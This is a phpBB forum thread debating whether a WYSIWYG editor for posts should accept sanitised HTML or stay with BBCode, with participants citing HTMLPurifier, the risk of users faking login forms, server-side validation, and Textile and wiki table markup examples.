[RFC] WYSIWYG editor
Re: [RFC] WYSIWYG editor
http://htmlpurifier.org/ is I believe the most secure HTML parser yet, I'm not sure but I'm not in favour of HTML - As said its not guaranteed secure, as specification changes, new things may be introduced, or work arrounds with the current with exploits. Further more, its more what a user can do - would you want any user to replicate a page, fake it for example. some forums may want certain form elements on thier pages, however a smart user may put the html "Please login again to download file <username> <password> <submit>" - Provided it fits in with the rest of the page how many would fall for this - Many imo.
Removing any atrrbuitues wouldnt help, there are effects which can only eba chieved by setting a class for example, or spoiler BBCode, how will one replicate that with HTML? - They cant, they still need something to parse that code properly, fitting it in with a WYSIWYG editor wouldnt work - Lets say you were to call it '<spoiler>xyz</spoiler>' - The editor must be modified to deal with this - Yes this is a problem with BBCode but its more problamatic with HTML.
On a forum where you want hundreds of types of contents to be displayed how will this work? Such as Youtube videoes, you will have to go into the effort of hardcoding this somewhat
Look at vBulletin, they have a WYSIWYG editor and allow the posting of HTML, however BBCode is the superior, The latter is almost always disabled for security and because compared to BBCode it has not much of a use(see above)
EDIT
Rotsblok, if only it was that simple - Look at the code of HTMLPurifier, I believe it is well commented - this will let you know of the complexity.
EDIT2
BBCode also allows for more powerful features such as processing it in PHP (lets say you want a random number seed for whatever reasons) - This can be done without reinventing the wheel by making a BBCode parser if a powerful one already exists
Removing any atrrbuitues wouldnt help, there are effects which can only eba chieved by setting a class for example, or spoiler BBCode, how will one replicate that with HTML? - They cant, they still need something to parse that code properly, fitting it in with a WYSIWYG editor wouldnt work - Lets say you were to call it '<spoiler>xyz</spoiler>' - The editor must be modified to deal with this - Yes this is a problem with BBCode but its more problamatic with HTML.
On a forum where you want hundreds of types of contents to be displayed how will this work? Such as Youtube videoes, you will have to go into the effort of hardcoding this somewhat
Look at vBulletin, they have a WYSIWYG editor and allow the posting of HTML, however BBCode is the superior, The latter is almost always disabled for security and because compared to BBCode it has not much of a use(see above)
EDIT
Rotsblok, if only it was that simple - Look at the code of HTMLPurifier, I believe it is well commented - this will let you know of the complexity.
EDIT2
BBCode also allows for more powerful features such as processing it in PHP (lets say you want a random number seed for whatever reasons) - This can be done without reinventing the wheel by making a BBCode parser if a powerful one already exists
Re: [RFC] WYSIWYG editor
Everything looks complex for me..Nelsaidi wrote:EDIT
Rotsblok, if only it was that simple - Look at the code of HTMLPurifier, I believe it is well commented - this will let you know of the complexity.
Ah oke .. was just finding out what you mean with attributes..Highway of Life wrote:No, I’m not trying to make an HTML parser or discussing the usefulness of such a parser with those rules, I’m specifically addressing the question of if a “Secure” HTML parser - Kellanved said that such a parser doesn’t exist, so I’m curious based on the rules I stated above how you would exploit such an HTML parser.
BTW just a thought... perhaps some additional easy to use parserfunctions.. something like the ability of predefined (through ACP or other) to format things more complex but more easier.
Like say i want to put a table in a post.. but adding things like [table][tr][td]bla[/td][td]etc...[/td][/tr][/table] is somewhat over typing.. maybe a thing that when you put in [table]bla|etc..[/table] it will make the table.. (although this can be done already me thinks..) but with more complex structures..
I know mediawiki has a thing called templates, that will put things in a certain defined layout when you put things in like {{position 1|position 2}} in a table or anything you want...
If you can do that you can then also make logical "scripts" like is position 1 is true then fill position 2 in at this place else ignore...
(hope i make some sense..)
ø = 1.618033988749895...
Everything has ø in it
Everything has ø in it
- Highway of Life
- Registered User
- Posts: 1399
- Joined: Tue Feb 08, 2005 10:18 pm
- Location: I'd love to change the World, but they won't give me the Source Code
- Contact:
Re: [RFC] WYSIWYG editor
Wiki's markup for tables is something like this...
Less typing is always nice.
And with such markup, you could still have a BBCode parser along with another parser, perhaps one that would do stuff like this:See if you recognize where that markup is from.
You can also take it a step further with classes...Or alignments...
Tables are done like so...
There's a lot more to it than that, but it’s a good small sample. What I like about using that kind of markup is that you could use it with the BBCode parser without conflict, it’s lighter than the (current) BBCode parser, and has a lot of functionality with very little markup to text. Compared to BBCode which is a lot of markup to text.
Textile Markup
Code: Select all
{|
|-
! header name
! Another header
|-
| cell content first row
| another cell
|-
| cell content second row
| another cell
|-
|}
And with such markup, you could still have a BBCode parser along with another parser, perhaps one that would do stuff like this:
Code: Select all
*bold*
_italic_
h1. Header 1
h2. Header 2
h3. Header 3
bq. Block Quotes
Footnotes[1]
fn1. Footnotes are great to use as anchors
??cite your author?? (<cite></cite>)
Insert @some code@ (<code></code>)
remove -some text- from a sentence. (<del></del>)
insert +some text+ in a sentence. (<ins></ins>)
~subscript~
^superscript^
* bullet lists
# numeric lists
#* nested lists
You can also take it a step further with classes...
Code: Select all
p(className). Paragraph with a CSS class name
p(#super-duper). Paragraph with a CSS id
Code: Select all
p<. align left
p>. align right
p=. align center
p<>. justified
p(. Left indent 1em
p))). Right indent 3em
p((((. Left indent 4em
Code: Select all
|_. Name |_. Species |_. Gender |
| Ranger | Horse | Male |
| Frosty | Cat | Male |
| Mindy | Horse | Female |
| Peaches | Dog | Female |
Textile Markup
- Highway of Life
- Registered User
- Posts: 1399
- Joined: Tue Feb 08, 2005 10:18 pm
- Location: I'd love to change the World, but they won't give me the Source Code
- Contact:
Re: [RFC] WYSIWYG editor
I think we're getting terribly offtopic, I’ll open a new RFC with markup options.
Re: [RFC] WYSIWYG editor
i was under the impression that wysiwyg editors like TinyMCE address's these very issues and the security built in is more than sufficient.
Re: [RFC] WYSIWYG editor
Errr, Javascript is client side - It is veryeasily modifiable, and what if the user doesnt have javascript enabled - the fallback is to use a standard text editor and they can insert anything.bobtheman wrote:i was under the impression that wysiwyg editors like TinyMCE address's these very issues and the security built in is more than sufficient.
All security checking etc must be done server side.
Addressing issues such as markup, well, see the topic HOL has/will create.
Re: [RFC] WYSIWYG editor
Hi there,
i [dev] now over 1 year a kind of private phpbb-wysiwyg and i think, i'am a genius in some things.
But, nevermind/anyway: Here are the main points, and here* i stucked over,
but it's not impossible: i know that 4 shure.
i [dev] now over 1 year a kind of private phpbb-wysiwyg and i think, i'am a genius in some things.
But, nevermind/anyway: Here are the main points, and here* i stucked over,
but it's not impossible: i know that 4 shure.
- Minimum: Support of Main BBCodes
- *Auto-Integration of any Custom BBCode
- Perfect Working in all possibilitys
- Near Sec-Safe Architecture
- Using much as possible of phpBB Core-Code to parse
and pre-filtering the display of problem-content (as in Live Preview) - Lightweight and clean (uncompressed) Code
- Switchable by User to "old mode"
- Min. Load Time
Re: [RFC] WYSIWYG editor
Got any code we can see?4seven wrote:Hi there,
i [dev] now over 1 year a kind of private phpbb-wysiwyg and i think, i'am a genius in some things.
But, nevermind/anyway: Here are the main points, and here* i stucked over,
but it's not impossible: i know that 4 shure.
- Minimum: Support of Main BBCodes
- *Auto-Integration of any Custom BBCode
- Perfect Working in all possibilitys
- Near Sec-Safe Architecture
- Using much as possible of phpBB Core-Code to parse
and pre-filtering the display of problem-content (as in Live Preview)- Lightweight and clean (uncompressed) Code
- Switchable by User to "old mode"
- Min. Load Time
Re: [RFC] WYSIWYG editor
i wait for make it public(!) viewable till syntax of 3.1 is clear.
- Erik Frèrejean
- Registered User
- Posts: 207
- Joined: Thu Oct 25, 2007 2:25 pm
- Location: surfnet
- Contact: